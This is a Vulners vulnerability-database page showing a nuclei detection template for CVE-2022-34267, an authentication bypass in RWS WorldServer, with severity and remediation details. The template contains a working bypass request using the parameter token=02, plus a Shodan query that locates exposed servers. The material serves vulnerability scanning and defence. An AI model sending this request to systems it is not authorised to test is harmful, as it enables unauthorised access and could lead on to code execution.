Lucene search
K

RWS WorldServer - Authentication Bypass

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

An issue in RWS WorldServer allows authentication bypass and execution of arbitrary Java code via .jar archive upload to the ws-api/v2/customizations/api endpoint

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-34267
25 Dec 202308:15
attackerkb
Circl
CVE-2022-34267
25 Dec 202309:31
circl
CNNVD
RWS WorldServer Security Vulnerability
25 Dec 202300:00
cnnvd
CVE
CVE-2022-34267
25 Dec 202300:00
cve
Cvelist
CVE-2022-34267
25 Dec 202300:00
cvelist
NVD
CVE-2022-34267
25 Dec 202308:15
nvd
OSV
CVE-2022-34267
25 Dec 202308:15
osv
Prion
Authentication flaw
25 Dec 202308:15
prion
Positive Technologies
PT-2023-13352 · Rws · Rws Worldserver
25 Dec 202300:00
ptsecurity
RedhatCVE
CVE-2022-34267
22 May 202521:54
redhatcve
Rows per page
id: CVE-2022-34267

info:
  name: RWS WorldServer - Authentication Bypass
  author: pdresearch,iamnoooob,rootxharsh,parthmalhotra
  severity: critical
  description: |
    An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint.
  impact: |
    Unauthenticated attackers can bypass all authentication by adding a token parameter with value 02, then upload and execute arbitrary Java code via JAR archives, potentially compromising the translation management system and accessing sensitive multilingual content.
  remediation: |
    Upgrade to RWS WorldServer version 11.7.3 or later that properly validates authentication tokens and restricts API access.
  reference:
    - https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver
    - https://www.rws.com/localization/products/trados-enterprise/worldserver/
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-34267
    cwe-id: CWE-287
    epss-score: 0.42162
    epss-percentile: 0.98524
    cpe: cpe:2.3:a:rws:worldserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rws
    product: worldserver
    shodan-query: title:"WorldServer"
  tags: cve,cve2022,worldserver,auth-bypass,vuln

http:
  - raw:
      - |
        GET /ws-api/v2/users/me/details?token=02 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"fullName":"System"'

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c6431d6c65005514387f562680d9315ac615c3cc3acdc891ea76e45a480411ee022100944994bb92cb112774a85a22fe9ec1e35feb66cf5093854aad625e8368a10352:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.42162
16